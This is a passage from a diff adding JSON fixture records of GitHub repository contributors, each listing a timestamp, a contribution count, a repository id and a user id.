1126, + "user": 5611 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6071, + "fields": { + "nest_created_at": "2024-09-22T06:36:20.955Z", + "nest_updated_at": "2024-09-22T18:22:40.710Z", + "contributions_count": 1, + "repository": 1126, + "user": 3551 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6072, + "fields": { + "nest_created_at": "2024-09-22T06:36:21.277Z", + "nest_updated_at": "2024-09-22T18:22:41.020Z", + "contributions_count": 1, + "repository": 1126, + "user": 5612 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6073, + "fields": { + "nest_created_at": "2024-09-22T06:36:21.629Z", + "nest_updated_at": "2024-09-22T18:22:41.367Z", + "contributions_count": 1, + "repository": 1126, + "user": 5613 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6074, + "fields": { + "nest_created_at": "2024-09-22T06:36:21.963Z", + "nest_updated_at": "2024-09-22T18:22:41.678Z", + "contributions_count": 1, + "repository": 1126, + "user": 5614 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6075, + "fields": { + "nest_created_at": "2024-09-22T06:36:22.272Z", + "nest_updated_at": "2024-09-22T18:22:41.993Z", + "contributions_count": 1, + "repository": 1126, + "user": 5615 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6076, + "fields": { + "nest_created_at": "2024-09-22T06:36:22.590Z", + "nest_updated_at": "2024-09-22T18:22:42.307Z", + "contributions_count": 1, + "repository": 1126, + "user": 5616 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6077, + "fields": { + "nest_created_at": "2024-09-22T06:36:22.905Z", + "nest_updated_at": "2024-09-22T18:22:42.619Z", + "contributions_count": 1, + "repository": 1126, + "user": 5617 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6078, + "fields": { + "nest_created_at": "2024-09-22T06:36:23.223Z", + "nest_updated_at": "2024-09-22T18:22:42.934Z", + "contributions_count": 1, + "repository": 1126, + "user": 5618 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6079, + "fields": { + "nest_created_at": "2024-09-22T06:36:23.541Z", + "nest_updated_at": "2024-09-22T18:22:43.252Z", + "contributions_count": 1, + "repository": 1126, + "user": 3916 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6080, + "fields": { + "nest_created_at": "2024-09-22T06:36:23.852Z", + "nest_updated_at": "2024-09-22T18:22:43.561Z", + "contributions_count": 1, + "repository": 1126, + "user": 5619 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6081, + "fields": { + "nest_created_at": "2024-09-22T06:36:24.201Z", + "nest_updated_at": "2024-09-22T18:22:43.904Z", + "contributions_count": 1, + "repository": 1126, + "user": 5620 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6082, + "fields": { + "nest_created_at": "2024-09-22T06:36:24.566Z", + "nest_updated_at": "2024-09-22T18:22:44.214Z", + "contributions_count": 1, + "repository": 1126, + "user": 124 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6083, + "fields": { + "nest_created_at": "2024-09-22T06:36:24.882Z", + "nest_updated_at": "2024-09-22T18:22:44.524Z", + "contributions_count": 1, + "repository": 1126, + "user": 5621 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6084, + "fields": { + "nest_created_at": "2024-09-22T06:36:25.204Z", + "nest_updated_at": "2024-09-22T18:22:44.844Z", + "contributions_count": 1, + "repository": 1126, + "user": 5622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6085, + "fields": { + "nest_created_at": "2024-09-22T06:36:25.517Z", + "nest_updated_at": "2024-09-22T18:22:45.156Z", + "contributions_count": 1, + "repository": 1126, + "user": 5623 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6086, + "fields": { + "nest_created_at": "2024-09-22T06:36:25.839Z", + "nest_updated_at": "2024-09-22T18:22:45.467Z", + "contributions_count": 1, + "repository": 1126, + "user": 5624 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6087, + "fields": { + "nest_created_at": "2024-09-22T06:36:26.154Z", + "nest_updated_at": "2024-09-22T18:22:45.794Z", + "contributions_count": 1, + "repository": 1126, + "user": 450 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6088, + "fields": { + "nest_created_at": "2024-09-22T06:36:32.943Z", + "nest_updated_at": "2024-09-22T19:29:53.225Z", + "contributions_count": 1111, + "repository": 1127, + "user": 40 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6089, + "fields": { + "nest_created_at": "2024-09-22T06:36:33.258Z", + "nest_updated_at": "2024-09-22T19:29:53.540Z", + "contributions_count": 1091, + "repository": 1127, + "user": 474 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6090, + "fields": { + "nest_created_at": "2024-09-22T06:36:33.644Z", + "nest_updated_at": "2024-09-22T19:29:53.855Z", + "contributions_count": 1007, + "repository": 1127, + "user": 519 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6091, + "fields": { + "nest_created_at": "2024-09-22T06:36:33.965Z", + "nest_updated_at": "2024-09-22T19:29:54.187Z", + "contributions_count": 743, + "repository": 1127, + "user": 469 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6092, + "fields": { + "nest_created_at": "2024-09-22T06:36:34.287Z", + "nest_updated_at": "2024-09-22T19:29:54.500Z", + "contributions_count": 432, + "repository": 1127, + "user": 476 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6093, + "fields": { + "nest_created_at": "2024-09-22T06:36:34.603Z", + "nest_updated_at": "2024-09-22T19:29:54.811Z", + "contributions_count": 157, + "repository": 1127, + "user": 477 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6094, + "fields": { + "nest_created_at": "2024-09-22T06:36:34.915Z", + "nest_updated_at": "2024-09-22T19:29:55.135Z", + "contributions_count": 156, + "repository": 1127, + "user": 481 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6095, + "fields": { + "nest_created_at": "2024-09-22T06:36:35.234Z", + "nest_updated_at": "2024-09-22T19:29:55.450Z", + "contributions_count": 133, + "repository": 1127, + "user": 2799 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6096, + "fields": { + "nest_created_at": "2024-09-22T06:36:35.551Z", + "nest_updated_at": "2024-09-22T19:29:55.759Z", + "contributions_count": 100, + "repository": 1127, + "user": 473 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6097, + "fields": { + "nest_created_at": "2024-09-22T06:36:35.859Z", + "nest_updated_at": "2024-09-22T19:29:56.102Z", + "contributions_count": 78, + "repository": 1127, + "user": 5626 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6098, + "fields": { + "nest_created_at": "2024-09-22T06:36:36.178Z", + "nest_updated_at": "2024-09-22T19:29:56.416Z", + "contributions_count": 68, + "repository": 1127, + "user": 5627 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6099, + "fields": { + "nest_created_at": "2024-09-22T06:36:36.503Z", + "nest_updated_at": "2024-09-22T19:29:56.737Z", + "contributions_count": 62, + "repository": 1127, + "user": 5628 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6100, + "fields": { + "nest_created_at": "2024-09-22T06:36:36.823Z", + "nest_updated_at": "2024-09-22T19:29:57.058Z", + "contributions_count": 57, + "repository": 1127, + "user": 5629 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6101, + "fields": { + "nest_created_at": "2024-09-22T06:36:37.147Z", + "nest_updated_at": "2024-09-22T19:29:57.371Z", + "contributions_count": 50, + "repository": 1127, + "user": 5630 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6102, + "fields": { + "nest_created_at": "2024-09-22T06:36:37.466Z", + "nest_updated_at": "2024-09-22T19:29:57.680Z", + "contributions_count": 47, + "repository": 1127, + "user": 800 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6103, + "fields": { + "nest_created_at": "2024-09-22T06:36:37.788Z", + "nest_updated_at": "2024-09-22T19:29:58.005Z", + "contributions_count": 44, + "repository": 1127, + "user": 4925 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6104, + "fields": { + "nest_created_at": "2024-09-22T06:36:38.146Z", + "nest_updated_at": "2024-09-22T19:29:58.317Z", + "contributions_count": 41, + "repository": 1127, + "user": 5631 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6105, + "fields": { + "nest_created_at": "2024-09-22T06:36:38.468Z", + "nest_updated_at": "2024-09-22T19:29:58.625Z", + "contributions_count": 41, + "repository": 1127, + "user": 5632 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6106, + "fields": { + "nest_created_at": "2024-09-22T06:36:38.801Z", + "nest_updated_at": "2024-09-22T19:29:58.935Z", + "contributions_count": 41, + "repository": 1127, + "user": 5633 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6107, + "fields": { + "nest_created_at": "2024-09-22T06:36:39.120Z", + "nest_updated_at": "2024-09-22T19:29:59.250Z", + "contributions_count": 39, + "repository": 1127, + "user": 5634 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6108, + "fields": { + "nest_created_at": "2024-09-22T06:36:39.443Z", + "nest_updated_at": "2024-09-22T19:29:59.584Z", + "contributions_count": 35, + "repository": 1127, + "user": 5635 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6109, + "fields": { + "nest_created_at": "2024-09-22T06:36:39.780Z", + "nest_updated_at": "2024-09-22T19:29:59.941Z", + "contributions_count": 33, + "repository": 1127, + "user": 5636 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6110, + "fields": { + "nest_created_at": "2024-09-22T06:36:40.105Z", + "nest_updated_at": "2024-09-22T19:30:00.269Z", + "contributions_count": 32, + "repository": 1127, + "user": 5637 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6111, + "fields": { + "nest_created_at": "2024-09-22T06:36:40.450Z", + "nest_updated_at": "2024-09-22T19:30:00.579Z", + "contributions_count": 29, + "repository": 1127, + "user": 5638 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6112, + "fields": { + "nest_created_at": "2024-09-22T06:36:40.770Z", + "nest_updated_at": "2024-09-22T19:30:00.901Z", + "contributions_count": 28, + "repository": 1127, + "user": 502 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6113, + "fields": { + "nest_created_at": "2024-09-22T06:36:41.079Z", + "nest_updated_at": "2024-09-22T19:30:01.235Z", + "contributions_count": 27, + "repository": 1127, + "user": 570 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6114, + "fields": { + "nest_created_at": "2024-09-22T06:36:41.391Z", + "nest_updated_at": "2024-09-22T19:30:01.557Z", + "contributions_count": 26, + "repository": 1127, + "user": 5553 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6115, + "fields": { + "nest_created_at": "2024-09-22T06:36:41.714Z", + "nest_updated_at": "2024-09-22T19:30:01.874Z", + "contributions_count": 26, + "repository": 1127, + "user": 222 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6116, + "fields": { + "nest_created_at": "2024-09-22T06:36:42.031Z", + "nest_updated_at": "2024-09-22T19:30:02.193Z", + "contributions_count": 25, + "repository": 1127, + "user": 5639 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6117, + "fields": { + "nest_created_at": "2024-09-22T06:36:42.355Z", + "nest_updated_at": "2024-09-22T19:30:02.525Z", + "contributions_count": 24, + "repository": 1127, + "user": 185 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6118, + "fields": { + "nest_created_at": "2024-09-22T06:36:42.692Z", + "nest_updated_at": "2024-09-22T19:30:02.892Z", + "contributions_count": 23, + "repository": 1127, + "user": 5640 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6119, + "fields": { + "nest_created_at": "2024-09-22T06:36:43.005Z", + "nest_updated_at": "2024-09-22T19:30:03.228Z", + "contributions_count": 21, + "repository": 1127, + "user": 5641 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6120, + "fields": { + "nest_created_at": "2024-09-22T06:36:43.321Z", + "nest_updated_at": "2024-09-22T19:30:03.539Z", + "contributions_count": 19, + "repository": 1127, + "user": 132 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6121, + "fields": { + "nest_created_at": "2024-09-22T06:36:43.644Z", + "nest_updated_at": "2024-09-22T19:30:03.851Z", + "contributions_count": 19, + "repository": 1127, + "user": 5642 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6122, + "fields": { + "nest_created_at": "2024-09-22T06:36:43.952Z", + "nest_updated_at": "2024-09-22T19:30:04.171Z", + "contributions_count": 18, + "repository": 1127, + "user": 5643 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6123, + "fields": { + "nest_created_at": "2024-09-22T06:36:44.274Z", + "nest_updated_at": "2024-09-22T19:30:04.490Z", + "contributions_count": 18, + "repository": 1127, + "user": 681 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6124, + "fields": { + "nest_created_at": "2024-09-22T06:36:44.584Z", + "nest_updated_at": "2024-09-22T19:30:04.839Z", + "contributions_count": 17, + "repository": 1127, + "user": 5644 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6125, + "fields": { + "nest_created_at": "2024-09-22T06:36:44.905Z", + "nest_updated_at": "2024-09-22T19:30:05.173Z", + "contributions_count": 17, + "repository": 1127, + "user": 5645 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6126, + "fields": { + "nest_created_at": "2024-09-22T06:36:45.242Z", + "nest_updated_at": "2024-09-22T19:30:05.520Z", + "contributions_count": 17, + "repository": 1127, + "user": 5646 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6127, + "fields": { + "nest_created_at": "2024-09-22T06:36:45.552Z", + "nest_updated_at": "2024-09-22T19:30:05.836Z", + "contributions_count": 17, + "repository": 1127, + "user": 5647 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6128, + "fields": { + "nest_created_at": "2024-09-22T06:36:45.866Z", + "nest_updated_at": "2024-09-22T19:30:06.153Z", + "contributions_count": 16, + "repository": 1127, + "user": 5648 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6129, + "fields": { + "nest_created_at": "2024-09-22T06:36:46.196Z", + "nest_updated_at": "2024-09-22T19:30:06.464Z", + "contributions_count": 14, + "repository": 1127, + "user": 5649 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6130, + "fields": { + "nest_created_at": "2024-09-22T06:36:46.512Z", + "nest_updated_at": "2024-09-22T19:30:06.780Z", + "contributions_count": 14, + "repository": 1127, + "user": 57 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6131, + "fields": { + "nest_created_at": "2024-09-22T06:36:46.869Z", + "nest_updated_at": "2024-09-22T19:30:07.100Z", + "contributions_count": 14, + "repository": 1127, + "user": 5650 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6132, + "fields": { + "nest_created_at": "2024-09-22T06:36:47.222Z", + "nest_updated_at": "2024-09-22T19:30:07.415Z", + "contributions_count": 13, + "repository": 1127, + "user": 5651 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6133, + "fields": { + "nest_created_at": "2024-09-22T06:36:47.552Z", + "nest_updated_at": "2024-09-22T19:30:07.728Z", + "contributions_count": 12, + "repository": 1127, + "user": 1610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6134, + "fields": { + "nest_created_at": "2024-09-22T06:36:47.870Z", + "nest_updated_at": "2024-09-22T19:30:08.044Z", + "contributions_count": 12, + "repository": 1127, + "user": 5652 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6135, + "fields": { + "nest_created_at": "2024-09-22T06:36:48.182Z", + "nest_updated_at": "2024-09-22T19:30:08.365Z", + "contributions_count": 12, + "repository": 1127, + "user": 506 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6136, + "fields": { + "nest_created_at": "2024-09-22T06:36:48.504Z", + "nest_updated_at": "2024-09-22T19:30:08.679Z", + "contributions_count": 12, + "repository": 1127, + "user": 3798 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6137, + "fields": { + "nest_created_at": "2024-09-22T06:36:48.814Z", + "nest_updated_at": "2024-09-22T19:30:09.004Z", + "contributions_count": 12, + "repository": 1127, + "user": 5653 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6138, + "fields": { + "nest_created_at": "2024-09-22T06:36:49.135Z", + "nest_updated_at": "2024-09-22T19:30:09.331Z", + "contributions_count": 12, + "repository": 1127, + "user": 5654 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6139, + "fields": { + "nest_created_at": "2024-09-22T06:36:49.453Z", + "nest_updated_at": "2024-09-22T19:30:09.656Z", + "contributions_count": 11, + "repository": 1127, + "user": 5655 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6140, + "fields": { + "nest_created_at": "2024-09-22T06:36:49.776Z", + "nest_updated_at": "2024-09-22T19:30:09.971Z", + "contributions_count": 11, + "repository": 1127, + "user": 5656 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6141, + "fields": { + "nest_created_at": "2024-09-22T06:36:50.126Z", + "nest_updated_at": "2024-09-22T19:30:10.292Z", + "contributions_count": 9, + "repository": 1127, + "user": 5657 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6142, + "fields": { + "nest_created_at": "2024-09-22T06:36:50.445Z", + "nest_updated_at": "2024-09-22T19:30:10.606Z", + "contributions_count": 8, + "repository": 1127, + "user": 587 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6143, + "fields": { + "nest_created_at": "2024-09-22T06:36:50.760Z", + "nest_updated_at": "2024-09-22T19:30:10.925Z", + "contributions_count": 8, + "repository": 1127, + "user": 3440 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6144, + "fields": { + "nest_created_at": "2024-09-22T06:36:51.071Z", + "nest_updated_at": "2024-09-22T19:30:11.261Z", + "contributions_count": 8, + "repository": 1127, + "user": 5599 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6145, + "fields": { + "nest_created_at": "2024-09-22T06:36:51.387Z", + "nest_updated_at": "2024-09-22T19:30:11.574Z", + "contributions_count": 8, + "repository": 1127, + "user": 5658 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6146, + "fields": { + "nest_created_at": "2024-09-22T06:36:51.708Z", + "nest_updated_at": "2024-09-22T19:30:11.900Z", + "contributions_count": 8, + "repository": 1127, + "user": 5659 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6147, + "fields": { + "nest_created_at": "2024-09-22T06:36:52.030Z", + "nest_updated_at": "2024-09-22T19:30:12.216Z", + "contributions_count": 8, + "repository": 1127, + "user": 5660 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6148, + "fields": { + "nest_created_at": "2024-09-22T06:36:52.346Z", + "nest_updated_at": "2024-09-22T19:30:12.529Z", + "contributions_count": 7, + "repository": 1127, + "user": 470 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6149, + "fields": { + "nest_created_at": "2024-09-22T06:36:52.658Z", + "nest_updated_at": "2024-09-22T19:30:12.848Z", + "contributions_count": 7, + "repository": 1127, + "user": 4515 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6150, + "fields": { + "nest_created_at": "2024-09-22T06:36:52.985Z", + "nest_updated_at": "2024-09-22T19:30:13.190Z", + "contributions_count": 7, + "repository": 1127, + "user": 5313 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6151, + "fields": { + "nest_created_at": "2024-09-22T06:36:53.312Z", + "nest_updated_at": "2024-09-22T19:30:13.506Z", + "contributions_count": 7, + "repository": 1127, + "user": 5661 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6152, + "fields": { + "nest_created_at": "2024-09-22T06:36:53.625Z", + "nest_updated_at": "2024-09-22T19:30:13.821Z", + "contributions_count": 7, + "repository": 1127, + "user": 475 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6153, + "fields": { + "nest_created_at": "2024-09-22T06:36:53.944Z", + "nest_updated_at": "2024-09-22T19:30:14.140Z", + "contributions_count": 7, + "repository": 1127, + "user": 5662 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6154, + "fields": { + "nest_created_at": "2024-09-22T06:36:54.260Z", + "nest_updated_at": "2024-09-22T19:30:14.463Z", + "contributions_count": 6, + "repository": 1127, + "user": 5532 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6155, + "fields": { + "nest_created_at": "2024-09-22T06:36:54.580Z", + "nest_updated_at": "2024-09-22T19:30:14.786Z", + "contributions_count": 5, + "repository": 1127, + "user": 5663 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6156, + "fields": { + "nest_created_at": "2024-09-22T06:36:54.907Z", + "nest_updated_at": "2024-09-22T19:30:15.104Z", + "contributions_count": 5, + "repository": 1127, + "user": 5664 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6157, + "fields": { + "nest_created_at": "2024-09-22T06:36:55.216Z", + "nest_updated_at": "2024-09-22T19:30:15.428Z", + "contributions_count": 5, + "repository": 1127, + "user": 5665 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6158, + "fields": { + "nest_created_at": "2024-09-22T06:36:55.533Z", + "nest_updated_at": "2024-09-22T19:30:15.738Z", + "contributions_count": 5, + "repository": 1127, + "user": 5666 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6159, + "fields": { + "nest_created_at": "2024-09-22T06:36:55.849Z", + "nest_updated_at": "2024-09-22T19:30:16.045Z", + "contributions_count": 5, + "repository": 1127, + "user": 5667 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6160, + "fields": { + "nest_created_at": "2024-09-22T06:36:56.207Z", + "nest_updated_at": "2024-09-22T19:30:16.424Z", + "contributions_count": 5, + "repository": 1127, + "user": 5668 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6161, + "fields": { + "nest_created_at": "2024-09-22T06:36:56.518Z", + "nest_updated_at": "2024-09-22T19:30:16.756Z", + "contributions_count": 5, + "repository": 1127, + "user": 5669 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6162, + "fields": { + "nest_created_at": "2024-09-22T06:36:56.840Z", + "nest_updated_at": "2024-09-22T19:30:17.075Z", + "contributions_count": 5, + "repository": 1127, + "user": 5670 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6163, + "fields": { + "nest_created_at": "2024-09-22T06:36:57.158Z", + "nest_updated_at": "2024-09-22T19:30:17.386Z", + "contributions_count": 5, + "repository": 1127, + "user": 5671 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6164, + "fields": { + "nest_created_at": "2024-09-22T06:36:57.468Z", + "nest_updated_at": "2024-09-22T19:30:17.699Z", + "contributions_count": 4, + "repository": 1127, + "user": 5672 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6165, + "fields": { + "nest_created_at": "2024-09-22T06:36:57.787Z", + "nest_updated_at": "2024-09-22T19:30:18.036Z", + "contributions_count": 4, + "repository": 1127, + "user": 5101 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6166, + "fields": { + "nest_created_at": "2024-09-22T06:36:58.109Z", + "nest_updated_at": "2024-09-22T19:30:18.347Z", + "contributions_count": 4, + "repository": 1127, + "user": 4787 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6167, + "fields": { + "nest_created_at": "2024-09-22T06:36:58.468Z", + "nest_updated_at": "2024-09-22T19:30:18.664Z", + "contributions_count": 4, + "repository": 1127, + "user": 5273 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6168, + "fields": { + "nest_created_at": "2024-09-22T06:36:58.782Z", + "nest_updated_at": "2024-09-22T19:30:18.977Z", + "contributions_count": 4, + "repository": 1127, + "user": 5673 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6169, + "fields": { + "nest_created_at": "2024-09-22T06:36:59.102Z", + "nest_updated_at": "2024-09-22T19:30:19.297Z", + "contributions_count": 4, + "repository": 1127, + "user": 5674 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6170, + "fields": { + "nest_created_at": "2024-09-22T06:36:59.420Z", + "nest_updated_at": "2024-09-22T19:30:19.613Z", + "contributions_count": 4, + "repository": 1127, + "user": 3797 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6171, + "fields": { + "nest_created_at": "2024-09-22T06:36:59.779Z", + "nest_updated_at": "2024-09-22T19:30:19.932Z", + "contributions_count": 4, + "repository": 1127, + "user": 416 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6172, + "fields": { + "nest_created_at": "2024-09-22T06:37:00.122Z", + "nest_updated_at": "2024-09-22T19:30:20.240Z", + "contributions_count": 4, + "repository": 1127, + "user": 4059 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6173, + "fields": { + "nest_created_at": "2024-09-22T06:37:00.474Z", + "nest_updated_at": "2024-09-22T19:30:20.562Z", + "contributions_count": 4, + "repository": 1127, + "user": 5675 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6174, + "fields": { + "nest_created_at": "2024-09-22T06:37:00.786Z", + "nest_updated_at": "2024-09-22T19:30:20.876Z", + "contributions_count": 4, + "repository": 1127, + "user": 5676 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6175, + "fields": { + "nest_created_at": "2024-09-22T06:37:01.105Z", + "nest_updated_at": "2024-09-22T19:30:21.196Z", + "contributions_count": 4, + "repository": 1127, + "user": 2854 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6176, + "fields": { + "nest_created_at": "2024-09-22T06:37:01.427Z", + "nest_updated_at": "2024-09-22T19:30:21.511Z", + "contributions_count": 3, + "repository": 1127, + "user": 5677 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6177, + "fields": { + "nest_created_at": "2024-09-22T06:37:01.738Z", + "nest_updated_at": "2024-09-22T19:30:21.820Z", + "contributions_count": 3, + "repository": 1127, + "user": 5678 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6178, + "fields": { + "nest_created_at": "2024-09-22T06:37:02.066Z", + "nest_updated_at": "2024-09-22T19:30:22.148Z", + "contributions_count": 3, + "repository": 1127, + "user": 5679 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6179, + "fields": { + "nest_created_at": "2024-09-22T06:37:02.384Z", + "nest_updated_at": "2024-09-22T19:30:22.484Z", + "contributions_count": 3, + "repository": 1127, + "user": 5680 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6180, + "fields": { + "nest_created_at": "2024-09-22T06:37:02.697Z", + "nest_updated_at": "2024-09-22T19:30:22.803Z", + "contributions_count": 3, + "repository": 1127, + "user": 5681 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6181, + "fields": { + "nest_created_at": "2024-09-22T06:37:03.016Z", + "nest_updated_at": "2024-09-22T19:30:23.143Z", + "contributions_count": 3, + "repository": 1127, + "user": 5437 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6182, + "fields": { + "nest_created_at": "2024-09-22T06:37:03.328Z", + "nest_updated_at": "2024-09-22T19:30:23.461Z", + "contributions_count": 3, + "repository": 1127, + "user": 5682 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6183, + "fields": { + "nest_created_at": "2024-09-22T06:37:03.648Z", + "nest_updated_at": "2024-09-22T19:30:23.781Z", + "contributions_count": 3, + "repository": 1127, + "user": 5683 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6184, + "fields": { + "nest_created_at": "2024-09-22T06:37:03.961Z", + "nest_updated_at": "2024-09-22T19:30:24.115Z", + "contributions_count": 3, + "repository": 1127, + "user": 5684 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6185, + "fields": { + "nest_created_at": "2024-09-22T06:37:04.275Z", + "nest_updated_at": "2024-09-22T19:30:24.440Z", + "contributions_count": 3, + "repository": 1127, + "user": 5685 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6186, + "fields": { + "nest_created_at": "2024-09-22T06:37:04.591Z", + "nest_updated_at": "2024-09-22T19:30:24.753Z", + "contributions_count": 3, + "repository": 1127, + "user": 5590 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6187, + "fields": { + "nest_created_at": "2024-09-22T06:37:04.919Z", + "nest_updated_at": "2024-09-22T19:30:25.090Z", + "contributions_count": 3, + "repository": 1127, + "user": 496 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6188, + "fields": { + "nest_created_at": "2024-09-22T06:37:05.676Z", + "nest_updated_at": "2024-09-22T19:30:25.792Z", + "contributions_count": 3, + "repository": 1127, + "user": 5686 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6189, + "fields": { + "nest_created_at": "2024-09-22T06:37:06.018Z", + "nest_updated_at": "2024-09-22T19:30:26.103Z", + "contributions_count": 3, + "repository": 1127, + "user": 5687 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6190, + "fields": { + "nest_created_at": "2024-09-22T06:37:06.338Z", + "nest_updated_at": "2024-09-22T19:30:26.506Z", + "contributions_count": 3, + "repository": 1127, + "user": 5688 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6191, + "fields": { + "nest_created_at": "2024-09-22T06:37:06.667Z", + "nest_updated_at": "2024-09-22T19:30:26.824Z", + "contributions_count": 2, + "repository": 1127, + "user": 5689 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6192, + "fields": { + "nest_created_at": "2024-09-22T06:37:06.986Z", + "nest_updated_at": "2024-09-22T19:30:27.137Z", + "contributions_count": 2, + "repository": 1127, + "user": 5690 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6193, + "fields": { + "nest_created_at": "2024-09-22T06:37:07.306Z", + "nest_updated_at": "2024-09-22T19:30:28.447Z", + "contributions_count": 2, + "repository": 1127, + "user": 5691 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6194, + "fields": { + "nest_created_at": "2024-09-22T06:37:07.620Z", + "nest_updated_at": "2024-09-22T19:30:28.791Z", + "contributions_count": 2, + "repository": 1127, + "user": 4987 + } +}, 